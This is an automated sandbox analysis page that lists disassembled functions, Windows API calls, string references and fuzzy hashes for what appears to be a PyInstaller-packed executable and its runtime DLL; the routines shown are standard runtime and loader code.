Function 00007FF7691C707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7691C70AD
GetLastError.KERNEL32 ref: 00007FF7691C70B9
CloseHandle.KERNEL32 ref: 00007FF7691C70D1
CreateFileW.KERNEL32 ref: 00007FF7691C70FC
WriteConsoleW.KERNEL32 ref: 00007FF7691C711B

Strings

CONOUT$, xrefs: 00007FF7691C70DD

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6af52981b5bd93c833f5eb161950a0489024dd7193d3ad3be74a19d3c06ac08f
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: AD118421A18A41C6E7549F12F844329E2B4FB58BE5FA00234DA1E87794DF7CE514CB50

Function 00007FF7691A81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A827A

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF7691A39F2), ref: 00007FF7691A838A

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction ID: dc9d47760a3d2ca5b22f3a38d267201b2ff75d67f3b73484d5aa69760eebe8c4
Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
Instruction Fuzzy Hash: 68417C72B196C6C2EA64AF12B4042BAA3A4FF85B80F944135DF5D57B89DE3CE801C760

Function 00007FFE133062D0 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE13306326
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE13306369
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE13306393
InterlockedPushEntrySList.KERNEL32 ref: 00007FFE133063B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE133063BC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE133063C5

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction ID: 95331ba962e91b6897781405d6a7c78559e53180b704b7f8b1a809176f030245
Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
Instruction Fuzzy Hash: F931E122B19F5188EB118B27A8041AD63A4FF28FF0B6846B5DE3D133A4EE3DD442C344

Function 00007FF7691A8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7691A7B70
Part of subcall function 00007FF7691A7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7691A7B83
Part of subcall function 00007FF7691A7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BA8
Part of subcall function 00007FF7691A7B50: GetLastError.KERNEL32 ref: 00007FF7691A7BB2
Part of subcall function 00007FF7691A7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7691A7BF2
Part of subcall function 00007FF7691A7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7691A7C0E
Part of subcall function 00007FF7691A7B50: CloseHandle.KERNEL32 ref: 00007FF7691A7C26

LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A848C
LocalFree.KERNEL32(?,00007FF7691A3814), ref: 00007FF7691A8495

Strings

S-1-3-4, xrefs: 00007FF7691A8441
D:(A;;FA;;;%s), xrefs: 00007FF7691A8477
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7691A8462
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7691A84A3

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction ID: c9ab67ecba2405bd3707d9f4ccde63262c900cbab63d9f16b4404932f0a0e6fe
Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction Fuzzy Hash: 24213031A08685C2F618BF61F4153E9A2B4FB84780FE44436EA4D53B96DF3CD945C760

Function 00007FF7691BA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA61D
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA64A
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA65B
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA66C
SetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA687

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction ID: 57b9157a358bfd0d0d490d7e3e87ab0247492faeb7a1024bb74bf51c514f99b9
Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction Fuzzy Hash: B4113860B48242C2FA5C7F25B651139E2A39F487B0FE44734D83E066EADE2CB5018721

Function 00007FFE133038A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

EncodePointer.KERNEL32 ref: 00007FFE13303918
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE13303963
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13303B91

Strings

MOC, xrefs: 00007FFE1330392C
RCC, xrefs: 00007FFE13303934

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction ID: 5d14bb7f7ae126e2c0e8e7936ef9fcc0985c046511a1c4f85e930de763b7b301
Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction Fuzzy Hash: 5F91A273A08B818EE710CB66E8802AE7BA0F7547A8F14417AEF9D27765DF38D195C704

Function 00007FFE1330BB70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1330BC50

Part of subcall function 00007FFE13308C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE1330913D
Part of subcall function 00007FFE13308C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE13309175

Strings

std::nullptr_t , xrefs: 00007FFE1330BDC5
volatile , xrefs: 00007FFE1330BBD3, 00007FFE1330BD21
std::nullptr_t, xrefs: 00007FFE1330BDF1
volatile, xrefs: 00007FFE1330BBE2, 00007FFE1330BD30

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction ID: 0682f87c3c18d3d479ff9e9da1c76e920fd00e96dce7eacdba13cfdbe7fe842a
Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction Fuzzy Hash: 7B717F71A08E428CEB58CF56D9501BCA7B4BB257A4F4445B5DA6D23AB9DF3CE250C308

Function 00007FFE13303690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13306710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1330239E), ref: 00007FFE1330671E

EncodePointer.KERNEL32 ref: 00007FFE133036DC
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1330372B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330389F

Strings

RCC, xrefs: 00007FFE133036F9
MOC, xrefs: 00007FFE133036F0

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction ID: 7c840b8be91657f5a40371bd575335ee382201b86d704a9cdd3888d30f102607
Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction Fuzzy Hash: 19616936A08F858AE714CF66D0803AE77A0FB54BA8F144165EF5D23B68CF78E055C708

Function 00007FF7691A2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7691A2338
DialogBoxIndirectParamW.USER32 ref: 00007FF7691A23FE
DeleteObject.GDI32 ref: 00007FF7691A2431
DestroyIcon.USER32 ref: 00007FF7691A2443

Strings

Unhandled exception in script, xrefs: 00007FF7691A2368

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction ID: 7c90c80c26d2125f04316e98079a1f0a0b782f63b25dc51a241941874907bbbd
Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction Fuzzy Hash: 34313D32A09A86C9EB28AF61F8552F9A370FF88794F940135EA4D47B59DF3CD505C710

Function 00007FF7691A2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A283B
MessageBoxA.USER32 ref: 00007FF7691A284F

Strings

Error, xrefs: 00007FF7691A282C
%s%s: %s, xrefs: 00007FF7691A27EC
Error/warning (ANSI fallback), xrefs: 00007FF7691A2843

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction ID: 709f9a6250ef0c4ef748471060b9daa144d28ff9e2375aa63cf738b83d15f031
Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction Fuzzy Hash: 83216B72628AC6C2E624AF10F4517EAA374FF84784F905136EA8C43A99DF3CD646CB50

Function 00007FF7691B8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7691B8DC5
GetProcAddress.KERNEL32 ref: 00007FF7691B8DDB
FreeLibrary.KERNEL32 ref: 00007FF7691B8E02

Strings

CorExitProcess, xrefs: 00007FF7691B8DD4
mscoree.dll, xrefs: 00007FF7691B8DBC

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 3f23797772a02f4b2cd3ab0a2a3c6c4da112c766718274bdefd701c5b0b3b59e
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 52F06221B19702C2EA18AF24F4443799330AF49B61FE40636C96E862F4CF2CD04AC720

Function 00007FFE13309FA4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1330A01D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1330A03F
DName::DName.LIBVCRUNTIME ref: 00007FFE1330A052
DName::DName.LIBVCRUNTIME ref: 00007FFE1330A089
DName::DName.LIBVCRUNTIME ref: 00007FFE1330A094

Memory Dump Source

Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction ID: 7cb61d355a5f40449ad77c13eff0d40855d6e504d61ebdd8f5c1303e3e6f3e96
Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction Fuzzy Hash: EA415C32A08E5688F710CB62E9801BC33B4BB25BA0B5445B2DA6D637B5DF3CE956C304

Function 00007FF7691C8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7691C86A0
_set_statfp.LIBCMT ref: 00007FF7691C86BB
_set_statfp.LIBCMT ref: 00007FF7691C86D7
_set_statfp.LIBCMT ref: 00007FF7691C8713

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 405a8a5d5e02646b90e43f1e3faac176237b74da9f324872e234f4bdb685bbe3
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: E711BF36E18A13C3F65C3928F5D637982606F54364FF506B4F96F066E69F2CA8429A30

Function 00007FF7691BA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA706
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA717
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA728

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction ID: dd1ff62f630595b6a1cc1e96c42a5fd051ec86a089b1ff38ba40a3f1b78b23b4
Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction Fuzzy Hash: A7113D21B0C242C2FA5C7B25B551579E1B35F983B0EF84334E83E466EEDE2DA9428761

Function 00007FF7691BA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7691BA545
FlsSetValue.KERNEL32 ref: 00007FF7691BA564
FlsSetValue.KERNEL32 ref: 00007FF7691BA58C
FlsSetValue.KERNEL32 ref: 00007FF7691BA59D
FlsSetValue.KERNEL32 ref: 00007FF7691BA5AE

Memory Dump Source

Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction ID: 795eb78e52bd79cd74cd2637bde607f4aa409ca3a859816f0aa11aec20b55fc2
Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction Fuzzy Hash: 5711FA20F48207C2FA6C7F25B451579E2A34F59370EF84734D93E0A2DAED2CB6414271

Function 00007FF7691B52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5416
